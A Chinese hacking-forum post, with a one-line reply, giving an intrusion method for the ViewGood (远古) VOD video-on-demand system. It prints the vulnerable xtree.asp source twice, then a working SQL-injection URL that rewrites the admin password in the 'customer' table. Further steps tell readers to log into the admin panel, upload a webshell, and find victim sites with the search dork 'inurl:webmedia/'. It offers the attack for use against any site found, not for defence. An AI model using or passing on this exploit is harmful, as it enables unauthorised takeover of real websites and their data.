最新远古VOD点播影视系统模板入侵
<P>漏洞文件webmedia/common/function/xtree.asp<BR>〈!--#include file="../dbcon.inc.asp" --><BR>〈%<BR>iNode_ID = Request.QueryString("id")<BR>if Len(Session("SuperAdmin")) > 0 or Len(Session("LIVEAdmin")) > 0 or Len(Session</P><P>("VODAdmin")) > 0 then<BR>szSQL = "Select Type_ID,ParentID,TypeName FROM TypeInfo Where Type_ID>=20 AND ParentID=" & </P>
<P>iNode_ID<BR>else<BR>szSQL = "Select Type_ID,ParentID,TypeName FROM TypeInfo Where Type_ID>20 AND ParentID=" & </P>
<P>iNode_ID<BR>end if<BR>rsData.Open szSQL,con,1,3<BR>szRetVar = "<?xml version='1.0' encoding='GB2312'?><Root>"<BR>do while not rsData.EOF<BR>szRetVar = szRetVar & "<TypeInfo>"<BR>szRetVar = szRetVar & "<IDN>" & rsData("Type_ID") & "</IDN>"<BR>szRetVar = szRetVar & "<ParentID>" & rsData("ParentID") & "</ParentID>"<BR>szRetVar = szRetVar & "<TypeName>" & Replace(rsData("TypeName"), "&", "&") & "</TypeName>"<BR>szRetVar = szRetVar & "</TypeInfo>"<BR>rsData.MoveNext<BR>loop<BR>szRetVar = szRetVar & "</Root>"<BR>rsData.Close<BR>Response.CharSet = "GB2312"<BR>Response.C<BR>Response.Expires = -1<BR>Response.Write szRetVar<BR>%><BR>〈!--#include file="../dbend.inc.asp" --><BR>〈!--#include file="../dbcon.inc.asp" --><BR>〈%<BR>iNode_ID = Request.QueryString("id")<BR>if Len(Session("SuperAdmin")) > 0 or Len(Session("LIVEAdmin")) > 0 or Len(Session</P>
<P>("VODAdmin")) > 0 then<BR>szSQL = "Select Type_ID,ParentID,TypeName FROM TypeInfo Where Type_ID>=20 AND ParentID=" & </P>
<P>iNode_ID<BR>else<BR>szSQL = "Select Type_ID,ParentID,TypeName FROM TypeInfo Where Type_ID>20 AND ParentID=" & </P>
<P>iNode_ID<BR>end if<BR>rsData.Open szSQL,con,1,3<BR>szRetVar = "<?xml version='1.0' encoding='GB2312'?><Root>"<BR>do while not rsData.EOF<BR>szRetVar = szRetVar & "<TypeInfo>"<BR>szRetVar = szRetVar & "<IDN>" & rsData("Type_ID") & "</IDN>"<BR>szRetVar = szRetVar & "<ParentID>" & rsData("ParentID") & "</ParentID>"<BR>szRetVar = szRetVar & "<TypeName>" & Replace(rsData("TypeName"), "&", "&") & "</TypeName>"<BR>szRetVar = szRetVar & "</TypeInfo>"<BR>rsData.MoveNext<BR>loop<BR>szRetVar = szRetVar & "</Root>"<BR>rsData.Close<BR>Response.CharSet = "GB2312"<BR>Response.C<BR>Response.Expires = -1<BR>Response.Write szRetVar<BR>%><BR>〈!--#include file="../dbend.inc.asp" --><BR>很容易看出以上存在着DB权限注入 <BR>注射地址:<A href="http://WWWW.XXXXX.COM/webmedia/common/function/xtree.asp?id=1" target=_blank>http://WWWW.XXXXX.COM/webmedia/common/function/xtree.asp?id=1</A><BR>表段名:customer<BR>构造函数 把admin的pass改成fuck <BR><A href="http://WWWW.XXXXX.COM/webmedia/common/function/xtree.asp?id=1;update%20customer%20set%20UserPass='633f94d350db34d5'%20where%20UserName='admin'" target=_blank>http://WWWW.XXXXX.COM/webmedia/common/function/xtree.asp?id=1;update%20customer%20set%20UserPass='633f94d350db34d5'%20where%20UserName='admin'</A><BR><BR>登陆后台<A href="http://WWWW.XXXXX.COM/webmedia/admin/default.asp" target=_blank>http://WWWW.XXXXX.COM/webmedia/admin/default.asp</A> 直接上传大马 完事!<BR>测试方法:在google baidu搜: inurL:webmedia/ 随便找个站都可以入侵<BR>官方地址:<A href="http://www.viewgood.com/" target=_blank>http://www.viewgood.com/</A></P>
re:最新远古VOD点播影视系统模板入侵
<P>理解 你的心情!</P>
页:
[1]